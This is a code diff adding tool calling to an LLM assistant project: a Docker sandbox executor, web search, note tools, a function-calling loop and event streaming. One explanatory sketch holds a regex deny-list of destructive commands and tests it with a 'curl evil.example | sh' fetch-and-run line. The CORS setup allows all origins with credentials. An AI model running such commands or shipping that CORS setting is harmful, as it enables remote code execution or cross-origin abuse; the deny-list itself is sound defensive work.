# Fix permissions so sandbox user can read the file (run as root)
chown_proc = await asyncio.create_subprocess_exec(
"docker", "exec", "-u", "root", container, "chown", "sandbox:sandbox", exec_path,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE
)
await chown_proc.communicate()
# Execute in container as sandbox user
if language == "python":
cmd = ["docker", "exec", "-u", "sandbox", container, "python3", exec_path]
else: # bash
cmd = ["docker", "exec", "-u", "sandbox", container, "bash", exec_path]
start_time = asyncio.get_event_loop().time()
proc = await asyncio.create_subprocess_exec(
*cmd,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE
)
try:
stdout, stderr = await asyncio.wait_for(
proc.communicate(),
timeout=timeout
)
execution_time = asyncio.get_event_loop().time() - start_time
# Truncate output to prevent memory issues
max_output = 10 * 1024 # 10KB
stdout_str = stdout[:max_output].decode('utf-8', errors='replace')
stderr_str = stderr[:max_output].decode('utf-8', errors='replace')
if len(stdout) > max_output:
stdout_str += "\n... (output truncated)"
if len(stderr) > max_output:
stderr_str += "\n... (output truncated)"
return {
"stdout": stdout_str,
"stderr": stderr_str,
"exit_code": proc.returncode,
"execution_time": round(execution_time, 2)
}
except asyncio.TimeoutError:
# Kill the process
try:
proc.kill()
await proc.wait()
except Exception:
pass
return {"error": f"Execution timeout after {timeout}s"}
except Exception as e:
return {"error": f"Execution failed: {str(e)}"}
finally:
# Cleanup temporary file
try:
os.unlink(temp_file)
except Exception:
pass
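The security screen above is a plain regex scan over the submitted code. A standalone sketch of the same idea (deny-list abbreviated for illustration):

```python
import re

# Abbreviated copy of the executor's deny-list, for illustration only
FORBIDDEN = [r'rm\s+-rf', r'curl.*\|.*sh', r'mkfs']

def is_forbidden(code: str) -> bool:
    # Case-insensitive scan, mirroring execute_code's validation step
    return any(re.search(p, code, re.IGNORECASE) for p in FORBIDDEN)

print(is_forbidden("curl http://evil.example/x | sh"))  # True
print(is_forbidden("print('hello world')"))             # False
```

A regex deny-list is best-effort: it catches obvious destructive one-liners, while the container boundary (unprivileged `sandbox` user, no host mounts) remains the real isolation mechanism.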

View File

@@ -0,0 +1,134 @@
"""
Trillium notes executor for searching and creating notes via ETAPI.
This module provides integration with Trillium notes through the ETAPI HTTP API.
"""
import os
import aiohttp
from typing import Dict
TRILLIUM_URL = os.getenv("TRILLIUM_URL", "http://localhost:8080")
TRILLIUM_TOKEN = os.getenv("TRILLIUM_ETAPI_TOKEN", "")
async def search_notes(args: Dict) -> Dict:
"""Search Trillium notes via ETAPI.
Args:
args: Dictionary containing:
- query (str): Search query
- limit (int, optional): Maximum notes to return (default: 5, max: 20)
Returns:
dict: Search results containing:
- notes (list): List of notes with noteId, title, content, type
- count (int): Number of notes returned
OR
- error (str): Error message if search failed
"""
query = args.get("query")
limit = args.get("limit", 5)
# Validation
if not query:
return {"error": "No query provided"}
if not TRILLIUM_TOKEN:
return {"error": "TRILLIUM_ETAPI_TOKEN not configured in environment"}
# Cap limit
limit = min(max(limit, 1), 20)
try:
async with aiohttp.ClientSession() as session:
async with session.get(
f"{TRILLIUM_URL}/etapi/search-notes",
params={"search": query, "limit": limit},
headers={"Authorization": TRILLIUM_TOKEN}
) as resp:
if resp.status == 200:
data = await resp.json()
return {
"notes": data,
"count": len(data)
}
elif resp.status == 401:
return {"error": "Authentication failed. Check TRILLIUM_ETAPI_TOKEN"}
else:
error_text = await resp.text()
return {"error": f"HTTP {resp.status}: {error_text}"}
except aiohttp.ClientConnectorError:
return {"error": f"Cannot connect to Trillium at {TRILLIUM_URL}"}
except Exception as e:
return {"error": f"Search failed: {str(e)}"}
async def create_note(args: Dict) -> Dict:
"""Create a note in Trillium via ETAPI.
Args:
args: Dictionary containing:
- title (str): Note title
- content (str): Note content in markdown or HTML
- parent_note_id (str, optional): Parent note ID to nest under
Returns:
dict: Creation result containing:
- noteId (str): ID of created note
- title (str): Title of created note
- success (bool): True if created successfully
OR
- error (str): Error message if creation failed
"""
title = args.get("title")
content = args.get("content")
parent_note_id = args.get("parent_note_id")
# Validation
if not title:
return {"error": "No title provided"}
if not content:
return {"error": "No content provided"}
if not TRILLIUM_TOKEN:
return {"error": "TRILLIUM_ETAPI_TOKEN not configured in environment"}
# Prepare payload
payload = {
"title": title,
"content": content,
"type": "text",
"mime": "text/html"
}
if parent_note_id:
payload["parentNoteId"] = parent_note_id
try:
async with aiohttp.ClientSession() as session:
async with session.post(
f"{TRILLIUM_URL}/etapi/create-note",
json=payload,
headers={"Authorization": TRILLIUM_TOKEN}
) as resp:
if resp.status in [200, 201]:
data = await resp.json()
return {
"noteId": data.get("noteId"),
"title": title,
"success": True
}
elif resp.status == 401:
return {"error": "Authentication failed. Check TRILLIUM_ETAPI_TOKEN"}
else:
error_text = await resp.text()
return {"error": f"HTTP {resp.status}: {error_text}"}
except aiohttp.ClientConnectorError:
return {"error": f"Cannot connect to Trillium at {TRILLIUM_URL}"}
except Exception as e:
return {"error": f"Note creation failed: {str(e)}"}
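Every executor in this package follows the same contract: success returns a payload dict, failure returns `{"error": ...}`. A caller can therefore branch on the `error` key instead of wrapping calls in try/except. A sketch using a hypothetical stub in place of a live ETAPI call (the stub only mirrors create_note's validation order):

```python
import asyncio

async def create_note_stub(args: dict) -> dict:
    # Hypothetical stand-in for create_note: same validation order, no HTTP
    if not args.get("title"):
        return {"error": "No title provided"}
    if not args.get("content"):
        return {"error": "No content provided"}
    return {"noteId": "abc123", "title": args["title"], "success": True}

bad = asyncio.run(create_note_stub({"content": "<p>hi</p>"}))
good = asyncio.run(create_note_stub({"title": "Ideas", "content": "<p>hi</p>"}))
print(bad)              # {'error': 'No title provided'}
print(good["success"])  # True
```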

View File

@@ -0,0 +1,55 @@
"""
Web search executor using DuckDuckGo.
This module provides web search capabilities without requiring API keys.
"""
from typing import Dict
from duckduckgo_search import DDGS
async def search_web(args: Dict) -> Dict:
"""Search the web using DuckDuckGo.
Args:
args: Dictionary containing:
- query (str): The search query
- max_results (int, optional): Maximum results to return (default: 5, max: 10)
Returns:
dict: Search results containing:
- results (list): List of search results with title, url, snippet
- count (int): Number of results returned
OR
- error (str): Error message if search failed
"""
query = args.get("query")
max_results = args.get("max_results", 5)
# Validation
if not query:
return {"error": "No query provided"}
# Cap max_results
max_results = min(max(max_results, 1), 10)
try:
# Note: DDGS is synchronous, so this call blocks the event loop while the search runs
with DDGS() as ddgs:
results = []
# Perform text search
for result in ddgs.text(query, max_results=max_results):
results.append({
"title": result.get("title", ""),
"url": result.get("href", ""),
"snippet": result.get("body", "")
})
return {
"results": results,
"count": len(results)
}
except Exception as e:
return {"error": f"Search failed: {str(e)}"}
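Because `DDGS` is a synchronous client, calling it inside a coroutine blocks the event loop for the duration of the search. One way to keep the loop responsive is to offload the call with `asyncio.to_thread`; a sketch with a hypothetical stand-in for the client:

```python
import asyncio
import time

def blocking_search(query: str) -> list:
    # Hypothetical stand-in for a synchronous client such as DDGS
    time.sleep(0.05)
    return [{"title": f"Result for {query}", "url": "https://example.com"}]

async def search_async(query: str) -> list:
    # Runs the blocking call in a worker thread; the event loop stays free
    return await asyncio.to_thread(blocking_search, query)

results = asyncio.run(search_async("python asyncio"))
print(results[0]["title"])  # Result for python asyncio
```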

View File

@@ -0,0 +1,235 @@
"""
Provider-agnostic function caller with iterative tool calling loop.
This module implements the iterative loop that allows LLMs to call tools
multiple times until they have the information they need to answer the user.
"""
import os
import logging
from typing import Dict, List, Optional
from llm.llm_router import call_llm, TOOL_ADAPTERS, BACKENDS
from .registry import get_registry
from .stream_events import get_stream_manager
logger = logging.getLogger(__name__)
class FunctionCaller:
"""Provider-agnostic iterative tool calling loop.
This class orchestrates the back-and-forth between the LLM and tools:
1. Call LLM with tools available
2. If LLM requests tool calls, execute them
3. Add results to conversation
4. Repeat until LLM is done or max iterations reached
"""
def __init__(self, backend: str, temperature: float = 0.7):
"""Initialize function caller.
Args:
backend: LLM backend to use ("OPENAI", "OLLAMA", etc.)
temperature: Temperature for LLM calls
"""
self.backend = backend
self.temperature = temperature
self.registry = get_registry()
self.max_iterations = int(os.getenv("MAX_TOOL_ITERATIONS", "5"))
# Resolve adapter for this backend
self.adapter = self._get_adapter()
def _get_adapter(self):
"""Get the appropriate adapter for this backend."""
adapter = TOOL_ADAPTERS.get(self.backend)
# For PRIMARY/SECONDARY/FALLBACK, determine adapter based on provider
if adapter is None and self.backend in ["PRIMARY", "SECONDARY", "FALLBACK"]:
cfg = BACKENDS.get(self.backend, {})
provider = cfg.get("provider", "").lower()
if provider == "openai":
adapter = TOOL_ADAPTERS["OPENAI"]
elif provider == "ollama":
adapter = TOOL_ADAPTERS["OLLAMA"]
elif provider == "mi50":
adapter = TOOL_ADAPTERS["MI50"]
return adapter
async def call_with_tools(
self,
messages: List[Dict],
max_tokens: int = 2048,
session_id: Optional[str] = None
) -> Dict:
"""Execute LLM with iterative tool calling.
Args:
messages: Conversation history
max_tokens: Maximum tokens for LLM response
session_id: Optional session ID for streaming events
Returns:
dict: {
"content": str, # Final response
"iterations": int, # Number of iterations
"tool_calls": list, # All tool calls made
"messages": list, # Full conversation history
"truncated": bool (optional) # True if max iterations reached
}
"""
logger.info(f"🔍 FunctionCaller.call_with_tools() invoked with {len(messages)} messages")
tools = self.registry.get_tool_definitions()
logger.info(f"🔍 Got {len(tools or [])} tool definitions from registry")
# Get stream manager for emitting events
stream_manager = get_stream_manager()
should_stream = session_id and stream_manager.has_subscribers(session_id)
# If no tools are enabled, just call LLM directly
if not tools:
logger.warning("FunctionCaller invoked but no tools are enabled")
response = await call_llm(
messages=messages,
backend=self.backend,
temperature=self.temperature,
max_tokens=max_tokens
)
return {
"content": response,
"iterations": 1,
"tool_calls": [],
"messages": messages + [{"role": "assistant", "content": response}]
}
conversation = messages.copy()
all_tool_calls = []
for iteration in range(self.max_iterations):
logger.info(f"Tool calling iteration {iteration + 1}/{self.max_iterations}")
# Emit thinking event
if should_stream:
await stream_manager.emit(session_id, "thinking", {
"message": f"🤔 Thinking... (iteration {iteration + 1}/{self.max_iterations})"
})
# Call LLM with tools
try:
response = await call_llm(
messages=conversation,
backend=self.backend,
temperature=self.temperature,
max_tokens=max_tokens,
tools=tools,
tool_choice="auto",
return_adapter_response=True
)
except Exception as e:
logger.error(f"LLM call failed: {str(e)}")
if should_stream:
await stream_manager.emit(session_id, "error", {
"message": f"❌ Error: {str(e)}"
})
return {
"content": f"Error calling LLM: {str(e)}",
"iterations": iteration + 1,
"tool_calls": all_tool_calls,
"messages": conversation,
"error": True
}
# Add assistant message to conversation
if response.get("content"):
conversation.append({
"role": "assistant",
"content": response["content"]
})
# Check for tool calls
tool_calls = response.get("tool_calls")
logger.debug(f"Response from LLM: content_length={len(response.get('content', ''))}, tool_calls={tool_calls}")
if not tool_calls:
# No more tool calls - LLM is done
logger.info(f"Tool calling complete after {iteration + 1} iterations")
if should_stream:
await stream_manager.emit(session_id, "done", {
"message": "✅ Complete!",
"final_answer": response["content"]
})
return {
"content": response["content"],
"iterations": iteration + 1,
"tool_calls": all_tool_calls,
"messages": conversation
}
# Execute each tool call
logger.info(f"Executing {len(tool_calls)} tool call(s)")
for tool_call in tool_calls:
all_tool_calls.append(tool_call)
tool_name = tool_call.get("name")
tool_args = tool_call.get("arguments", {})
tool_id = tool_call.get("id", "unknown")
logger.info(f"Calling tool: {tool_name} with args: {tool_args}")
# Emit tool call event
if should_stream:
await stream_manager.emit(session_id, "tool_call", {
"tool": tool_name,
"args": tool_args,
"message": f"🔧 Using tool: {tool_name}"
})
try:
# Execute tool
result = await self.registry.execute_tool(tool_name, tool_args)
logger.info(f"Tool {tool_name} executed successfully")
# Emit tool result event
if should_stream:
# Format result preview
result_preview = str(result)
if len(result_preview) > 200:
result_preview = result_preview[:200] + "..."
await stream_manager.emit(session_id, "tool_result", {
"tool": tool_name,
"result": result,
"message": f"📊 Result: {result_preview}"
})
except Exception as e:
logger.error(f"Tool {tool_name} execution failed: {str(e)}")
result = {"error": f"Tool execution failed: {str(e)}"}
# Format result using adapter
if not self.adapter:
logger.warning(f"No adapter available for backend {self.backend}, using fallback format")
result_msg = {
"role": "user",
"content": f"Tool {tool_name} result: {result}"
}
else:
result_msg = self.adapter.format_tool_result(
tool_id,
tool_name,
result
)
conversation.append(result_msg)
# Max iterations reached without completion
logger.warning(f"Tool calling truncated after {self.max_iterations} iterations")
return {
"content": response.get("content", ""),
"iterations": self.max_iterations,
"tool_calls": all_tool_calls,
"messages": conversation,
"truncated": True
}
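The loop's contract can be exercised without a live model. A sketch with a scripted LLM that requests one tool call and then answers (all names here are hypothetical, not the real adapter API):

```python
import asyncio

async def fake_llm(conversation: list) -> dict:
    # Scripted model: first turn requests a tool, second turn answers
    if not any(m["role"] == "tool_result" for m in conversation):
        return {"content": "", "tool_calls": [
            {"id": "1", "name": "add", "arguments": {"a": 2, "b": 3}}]}
    return {"content": "The answer is 5.", "tool_calls": None}

async def run_loop(messages: list, max_iterations: int = 5) -> dict:
    conversation = list(messages)
    for iteration in range(max_iterations):
        response = await fake_llm(conversation)
        if not response["tool_calls"]:
            # No tool calls means the model is done
            return {"content": response["content"], "iterations": iteration + 1}
        for call in response["tool_calls"]:
            result = call["arguments"]["a"] + call["arguments"]["b"]  # "execute" the tool
            conversation.append({"role": "tool_result", "content": str(result)})
    return {"content": "", "truncated": True}

out = asyncio.run(run_loop([{"role": "user", "content": "2+3?"}]))
print(out)  # {'content': 'The answer is 5.', 'iterations': 2}
```

The same shape holds in `call_with_tools`: each iteration either terminates with a final answer or appends tool results and loops, with `truncated: True` marking the max-iterations bail-out.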

View File

@@ -0,0 +1,196 @@
"""
Provider-agnostic Tool Registry for Lyra.
This module provides a central registry for all available tools with
Lyra-native definitions (not provider-specific).
"""
import os
from typing import Dict, List, Optional
from .executors import execute_code, search_web, search_notes, create_note
class ToolRegistry:
"""Registry for managing available tools and their definitions.
Tools are defined in Lyra's own format (provider-agnostic), and
adapters convert them to provider-specific formats (OpenAI function
calling, Ollama XML prompts, etc.).
"""
def __init__(self):
"""Initialize the tool registry with feature flags from environment."""
self.tools = {}
self.executors = {}
# Feature flags from environment
self.code_execution_enabled = os.getenv("ENABLE_CODE_EXECUTION", "true").lower() == "true"
self.web_search_enabled = os.getenv("ENABLE_WEB_SEARCH", "true").lower() == "true"
self.trillium_enabled = os.getenv("ENABLE_TRILLIUM", "false").lower() == "true"
self._register_tools()
self._register_executors()
def _register_executors(self):
"""Register executor functions for each tool."""
if self.code_execution_enabled:
self.executors["execute_code"] = execute_code
if self.web_search_enabled:
self.executors["search_web"] = search_web
if self.trillium_enabled:
self.executors["search_notes"] = search_notes
self.executors["create_note"] = create_note
def _register_tools(self):
"""Register all available tools based on feature flags."""
if self.code_execution_enabled:
self.tools["execute_code"] = {
"name": "execute_code",
"description": "Execute Python or bash code in a secure sandbox environment. Use this to perform calculations, data processing, file operations, or any programmatic tasks. The sandbox is persistent across calls within a session and has common Python packages (numpy, pandas, requests, matplotlib, scipy) pre-installed.",
"parameters": {
"language": {
"type": "string",
"enum": ["python", "bash"],
"description": "The programming language to execute (python or bash)"
},
"code": {
"type": "string",
"description": "The code to execute. For multi-line code, use proper indentation. For Python, use standard Python 3.11 syntax."
},
"reason": {
"type": "string",
"description": "Brief explanation of why you're executing this code and what you expect to achieve"
}
},
"required": ["language", "code", "reason"]
}
if self.web_search_enabled:
self.tools["search_web"] = {
"name": "search_web",
"description": "Search the internet using DuckDuckGo to find current information, facts, news, or answers to questions. Returns a list of search results with titles, snippets, and URLs. Use this when you need up-to-date information or facts not in your training data.",
"parameters": {
"query": {
"type": "string",
"description": "The search query to look up on the internet"
},
"max_results": {
"type": "integer",
"description": "Maximum number of results to return (default: 5, max: 10)"
}
},
"required": ["query"]
}
if self.trillium_enabled:
self.tools["search_notes"] = {
"name": "search_notes",
"description": "Search through Trillium notes to find relevant information. Use this to retrieve knowledge, context, or information previously stored in the user's notes.",
"parameters": {
"query": {
"type": "string",
"description": "The search query to find matching notes"
},
"limit": {
"type": "integer",
"description": "Maximum number of notes to return (default: 5, max: 20)"
}
},
"required": ["query"]
}
self.tools["create_note"] = {
"name": "create_note",
"description": "Create a new note in Trillium. Use this to store important information, insights, or knowledge for future reference. Notes are stored in the user's Trillium knowledge base.",
"parameters": {
"title": {
"type": "string",
"description": "The title of the note"
},
"content": {
"type": "string",
"description": "The content of the note in markdown or HTML format"
},
"parent_note_id": {
"type": "string",
"description": "Optional ID of the parent note to nest this note under"
}
},
"required": ["title", "content"]
}
def get_tool_definitions(self) -> Optional[List[Dict]]:
"""Get list of all enabled tool definitions in Lyra format.
Returns:
list: List of tool definition dicts, or None if no tools enabled
"""
if not self.tools:
return None
return list(self.tools.values())
def get_tool_names(self) -> List[str]:
"""Get list of all enabled tool names.
Returns:
list: List of tool name strings
"""
return list(self.tools.keys())
def is_tool_enabled(self, tool_name: str) -> bool:
"""Check if a specific tool is enabled.
Args:
tool_name: Name of the tool to check
Returns:
bool: True if tool is enabled, False otherwise
"""
return tool_name in self.tools
def register_executor(self, tool_name: str, executor_func):
"""Register an executor function for a tool.
Args:
tool_name: Name of the tool
executor_func: Async function that executes the tool
"""
self.executors[tool_name] = executor_func
async def execute_tool(self, name: str, arguments: dict) -> dict:
"""Execute a tool by name.
Args:
name: Tool name
arguments: Tool arguments dict
Returns:
dict: Tool execution result
"""
if name not in self.executors:
return {"error": f"Unknown tool: {name}"}
executor = self.executors[name]
try:
return await executor(arguments)
except Exception as e:
return {"error": f"Tool execution failed: {str(e)}"}
# Global registry instance (singleton pattern)
_registry = None
def get_registry() -> ToolRegistry:
"""Get the global ToolRegistry instance.
Returns:
ToolRegistry: The global registry instance
"""
global _registry
if _registry is None:
_registry = ToolRegistry()
return _registry
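Usage is straightforward: fetch the singleton, optionally register a custom executor, and dispatch by name. A self-contained sketch of the same dispatch pattern, using a minimal stand-in registry (the real one pulls feature flags from the environment):

```python
import asyncio

class MiniRegistry:
    # Minimal stand-in for ToolRegistry's executor dispatch
    def __init__(self):
        self.executors = {}

    def register_executor(self, name, func):
        self.executors[name] = func

    async def execute_tool(self, name: str, arguments: dict) -> dict:
        if name not in self.executors:
            return {"error": f"Unknown tool: {name}"}
        try:
            return await self.executors[name](arguments)
        except Exception as e:
            return {"error": f"Tool execution failed: {str(e)}"}

async def echo(args: dict) -> dict:
    return {"echo": args.get("text", "")}

registry = MiniRegistry()
registry.register_executor("echo", echo)
print(asyncio.run(registry.execute_tool("echo", {"text": "hi"})))  # {'echo': 'hi'}
print(asyncio.run(registry.execute_tool("missing", {})))           # {'error': 'Unknown tool: missing'}
```

Returning an error dict instead of raising keeps tool failures inside the conversation, so the LLM can see the error and retry or answer without tools.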

View File

@@ -0,0 +1,91 @@
"""
Event streaming for tool calling "show your work" feature.
This module manages Server-Sent Events (SSE) for broadcasting the internal
thinking process during tool calling operations.
"""
import asyncio
from typing import Dict, Optional
from collections import defaultdict
import json
import logging
logger = logging.getLogger(__name__)
class ToolStreamManager:
"""Manages SSE streams for tool calling events."""
def __init__(self):
# session_id -> list of queues (one per connected client)
self._subscribers: Dict[str, list] = defaultdict(list)
def subscribe(self, session_id: str) -> asyncio.Queue:
"""Subscribe to events for a session.
Returns:
Queue that will receive events for this session
"""
queue = asyncio.Queue()
self._subscribers[session_id].append(queue)
logger.info(f"New subscriber for session {session_id}, total: {len(self._subscribers[session_id])}")
return queue
def unsubscribe(self, session_id: str, queue: asyncio.Queue):
"""Unsubscribe from events for a session."""
if session_id in self._subscribers:
try:
self._subscribers[session_id].remove(queue)
logger.info(f"Removed subscriber for session {session_id}, remaining: {len(self._subscribers[session_id])}")
# Clean up empty lists
if not self._subscribers[session_id]:
del self._subscribers[session_id]
except ValueError:
pass
async def emit(self, session_id: str, event_type: str, data: dict):
"""Emit an event to all subscribers of a session.
Args:
session_id: Session to emit to
event_type: Type of event (thinking, tool_call, tool_result, done)
data: Event data
"""
if session_id not in self._subscribers:
return
event = {
"type": event_type,
"data": data
}
# Send to all subscribers
dead_queues = []
for queue in self._subscribers[session_id]:
try:
await queue.put(event)
except Exception as e:
logger.error(f"Failed to emit event to queue: {e}")
dead_queues.append(queue)
# Clean up dead queues
for queue in dead_queues:
self.unsubscribe(session_id, queue)
def has_subscribers(self, session_id: str) -> bool:
"""Check if a session has any active subscribers."""
return session_id in self._subscribers and len(self._subscribers[session_id]) > 0
# Global stream manager instance
_stream_manager: Optional[ToolStreamManager] = None
def get_stream_manager() -> ToolStreamManager:
"""Get the global stream manager instance."""
global _stream_manager
if _stream_manager is None:
_stream_manager = ToolStreamManager()
return _stream_manager
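A subscriber is just an `asyncio.Queue`, and `emit` pushes a copy of each event to every queue registered for the session. A minimal end-to-end sketch of the same fan-out pattern:

```python
import asyncio
from collections import defaultdict

class MiniStreamManager:
    # Minimal stand-in for ToolStreamManager: one queue per subscriber
    def __init__(self):
        self._subscribers = defaultdict(list)

    def subscribe(self, session_id: str) -> asyncio.Queue:
        queue = asyncio.Queue()
        self._subscribers[session_id].append(queue)
        return queue

    async def emit(self, session_id: str, event_type: str, data: dict):
        for queue in self._subscribers[session_id]:
            await queue.put({"type": event_type, "data": data})

async def main():
    manager = MiniStreamManager()
    queue = manager.subscribe("session-1")
    await manager.emit("session-1", "thinking", {"message": "working..."})
    return await queue.get()

event = asyncio.run(main())
print(event["type"], event["data"]["message"])  # thinking working...
```

In the real manager an SSE endpoint would await `queue.get()` in a loop and forward each event to the browser as a `data:` frame.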

View File

@@ -3,6 +3,8 @@ import os
import httpx
import json
import logging
from typing import Optional, List, Dict
from autonomy.tools.adapters import OpenAIAdapter, OllamaAdapter, LlamaCppAdapter
logger = logging.getLogger(__name__)
@@ -39,6 +41,16 @@ DEFAULT_BACKEND = "PRIMARY"
# Reusable async HTTP client
http_client = httpx.AsyncClient(timeout=120.0)
# Tool adapters for each backend
TOOL_ADAPTERS = {
"OPENAI": OpenAIAdapter(),
"OLLAMA": OllamaAdapter(),
"MI50": LlamaCppAdapter(), # MI50 uses llama.cpp
"PRIMARY": None, # Determined at runtime
"SECONDARY": None, # Determined at runtime
"FALLBACK": None, # Determined at runtime
}
# ------------------------------------------------------------
# Public call
@@ -49,9 +61,12 @@ async def call_llm(
backend: str | None = None,
temperature: float = 0.7,
max_tokens: int = 512,
tools: Optional[List[Dict]] = None,
tool_choice: Optional[str] = None,
return_adapter_response: bool = False,
):
"""
Call an LLM backend with optional tool calling support.
Args:
prompt: String prompt (for completion-style APIs like mi50)
@@ -59,6 +74,13 @@ async def call_llm(
backend: Which backend to use (PRIMARY, SECONDARY, OPENAI, etc.)
temperature: Sampling temperature
max_tokens: Maximum tokens to generate
tools: List of Lyra tool definitions (provider-agnostic)
tool_choice: How to use tools ("auto", "required", "none")
return_adapter_response: If True, return dict with content and tool_calls
Returns:
str (default) or dict (if return_adapter_response=True):
{"content": str, "tool_calls": [...] or None}
"""
backend = (backend or DEFAULT_BACKEND).upper()
@@ -73,10 +95,54 @@ async def call_llm(
if not url or not model:
raise RuntimeError(f"Backend '{backend}' missing url/model in env")
# If tools are requested, use adapter to prepare request
if tools:
# Get adapter for this backend
adapter = TOOL_ADAPTERS.get(backend)
# For PRIMARY/SECONDARY/FALLBACK, determine adapter based on provider
if adapter is None and backend in ["PRIMARY", "SECONDARY", "FALLBACK"]:
if provider == "openai":
adapter = TOOL_ADAPTERS["OPENAI"]
elif provider == "ollama":
adapter = TOOL_ADAPTERS["OLLAMA"]
elif provider == "mi50":
adapter = TOOL_ADAPTERS["MI50"]
if adapter:
# Use messages array if provided, otherwise convert prompt to messages
if not messages:
messages = [{"role": "user", "content": prompt}]
# Prepare request through adapter
adapted_request = await adapter.prepare_request(messages, tools, tool_choice)
messages = adapted_request["messages"]
# Extract tools in provider format if present
provider_tools = adapted_request.get("tools")
provider_tool_choice = adapted_request.get("tool_choice")
else:
logger.warning(f"No adapter available for backend {backend}, ignoring tools")
provider_tools = None
provider_tool_choice = None
else:
provider_tools = None
provider_tool_choice = None
# -------------------------------
# Provider: MI50 (llama.cpp server)
# -------------------------------
if provider == "mi50":
# If tools requested, convert messages to prompt with tool instructions
if messages and tools:
# Combine messages into a prompt
prompt_parts = []
for msg in messages:
role = msg.get("role", "user")
content = msg.get("content", "")
prompt_parts.append(f"{role.capitalize()}: {content}")
prompt = "\n".join(prompt_parts) + "\nAssistant:"
payload = {
"prompt": prompt,
"n_predict": max_tokens,
@@ -87,7 +153,15 @@ async def call_llm(
r = await http_client.post(f"{url}/completion", json=payload)
r.raise_for_status()
data = r.json()
response_content = data.get("content", "")
# If caller wants adapter response with tool calls, parse and return
if return_adapter_response and tools:
adapter = TOOL_ADAPTERS.get(backend) or TOOL_ADAPTERS["MI50"]
return await adapter.parse_response(response_content)
else:
return response_content
except httpx.HTTPError as e:
logger.error(f"HTTP error calling mi50: {type(e).__name__}: {str(e)}")
raise RuntimeError(f"LLM API error (mi50): {type(e).__name__}: {str(e)}")
@@ -101,7 +175,9 @@ async def call_llm(
# -------------------------------
# Provider: OLLAMA (your 3090)
# -------------------------------
logger.info(f"🔍 LLM Router: provider={provider}, checking if ollama...")
if provider == "ollama":
logger.info(f"🔍 LLM Router: Matched ollama provider, tools={bool(tools)}, return_adapter_response={return_adapter_response}")
# Use messages array if provided, otherwise convert prompt to single user message
if messages:
chat_messages = messages
@@ -121,7 +197,19 @@ async def call_llm(
r = await http_client.post(f"{url}/api/chat", json=payload)
r.raise_for_status()
data = r.json()
response_content = data["message"]["content"]
# If caller wants adapter response with tool calls, parse and return
if return_adapter_response and tools:
logger.info(f"🔍 Ollama: return_adapter_response=True, calling adapter.parse_response")
adapter = TOOL_ADAPTERS.get(backend) or TOOL_ADAPTERS["OLLAMA"]
logger.info(f"🔍 Ollama: Using adapter {adapter.__class__.__name__}")
result = await adapter.parse_response(response_content)
logger.info(f"🔍 Ollama: Adapter returned {result}")
return result
else:
return response_content
except httpx.HTTPError as e:
logger.error(f"HTTP error calling ollama: {type(e).__name__}: {str(e)}")
raise RuntimeError(f"LLM API error (ollama): {type(e).__name__}: {str(e)}")
@@ -154,11 +242,49 @@ async def call_llm(
"temperature": temperature,
"max_tokens": max_tokens,
}
# Add tools if available (OpenAI native function calling)
if provider_tools:
payload["tools"] = provider_tools
if provider_tool_choice:
payload["tool_choice"] = provider_tool_choice
try:
r = await http_client.post(f"{url}/chat/completions", json=payload, headers=headers)
r.raise_for_status()
data = r.json()
# If caller wants adapter response with tool calls, parse and return
if return_adapter_response and tools:
# Create mock response object for adapter
class MockChoice:
def __init__(self, message_data):
self.message = type('obj', (object,), {})()
self.message.content = message_data.get("content")
# Convert tool_calls dicts to objects
raw_tool_calls = message_data.get("tool_calls")
if raw_tool_calls:
self.message.tool_calls = []
for tc in raw_tool_calls:
tool_call_obj = type('obj', (object,), {})()
tool_call_obj.id = tc.get("id")
tool_call_obj.function = type('obj', (object,), {})()
tool_call_obj.function.name = tc.get("function", {}).get("name")
tool_call_obj.function.arguments = tc.get("function", {}).get("arguments")
self.message.tool_calls.append(tool_call_obj)
else:
self.message.tool_calls = None
class MockResponse:
def __init__(self, data):
self.choices = [MockChoice(data["choices"][0]["message"])]
mock_resp = MockResponse(data)
adapter = TOOL_ADAPTERS.get(backend) or TOOL_ADAPTERS["OPENAI"]
return await adapter.parse_response(mock_resp)
else:
return data["choices"][0]["message"]["content"]
except httpx.HTTPError as e:
logger.error(f"HTTP error calling openai: {type(e).__name__}: {str(e)}")
raise RuntimeError(f"LLM API error (openai): {type(e).__name__}: {str(e)}")

View File

@@ -1,6 +1,16 @@
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from router import cortex_router
app = FastAPI()
# Add CORS middleware to allow SSE connections from nginx UI
app.add_middleware(
CORSMiddleware,
allow_origins=["*"], # In production, specify exact origins
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
app.include_router(cortex_router)

View File

@@ -4,3 +4,5 @@ python-dotenv==1.0.1
requests==2.32.3
httpx==0.27.2
pydantic==2.10.4
duckduckgo-search==6.3.5
aiohttp==3.9.1

View File

@@ -2,7 +2,9 @@
import os
import logging
import asyncio
from fastapi import APIRouter
from fastapi.responses import StreamingResponse
from pydantic import BaseModel from pydantic import BaseModel
from reasoning.reasoning import reason_check from reasoning.reasoning import reason_check
@@ -15,6 +17,7 @@ from intake.intake import add_exchange_internal
from autonomy.monologue.monologue import InnerMonologue
from autonomy.self.state import load_self_state
from autonomy.tools.stream_events import get_stream_manager
# -------------------------------------------------------------------
@@ -343,6 +346,7 @@ async def run_simple(req: ReasonRequest):
"""
from datetime import datetime
from llm.llm_router import call_llm
from autonomy.tools.function_caller import FunctionCaller
start_time = datetime.now()
@@ -396,16 +400,38 @@ async def run_simple(req: ReasonRequest):
temperature = req.temperature if req.temperature is not None else 0.7
# Check if tools are enabled
enable_tools = os.getenv("STANDARD_MODE_ENABLE_TOOLS", "false").lower() == "true"
# Call LLM with or without tools
try:
if enable_tools:
# Use FunctionCaller for tool-enabled conversation
logger.info(f"🛠️ Tool calling enabled for Standard Mode")
logger.info(f"🔍 Creating FunctionCaller with backend={backend}, temp={temperature}")
function_caller = FunctionCaller(backend, temperature)
logger.info(f"🔍 FunctionCaller created, calling call_with_tools...")
result = await function_caller.call_with_tools(
messages=messages,
max_tokens=2048,
session_id=req.session_id # Pass session_id for streaming
)
logger.info(f"🔍 call_with_tools returned: iterations={result.get('iterations')}, tool_calls={len(result.get('tool_calls', []))}")
# Log tool usage
if result.get("tool_calls"):
tool_names = [tc["name"] for tc in result["tool_calls"]]
logger.info(f"🔧 Tools used: {', '.join(tool_names)} ({result['iterations']} iterations)")
response = result["content"].strip()
else:
# Direct LLM call without tools (original behavior)
raw_response = await call_llm(
    messages=messages,
    backend=backend,
    temperature=temperature,
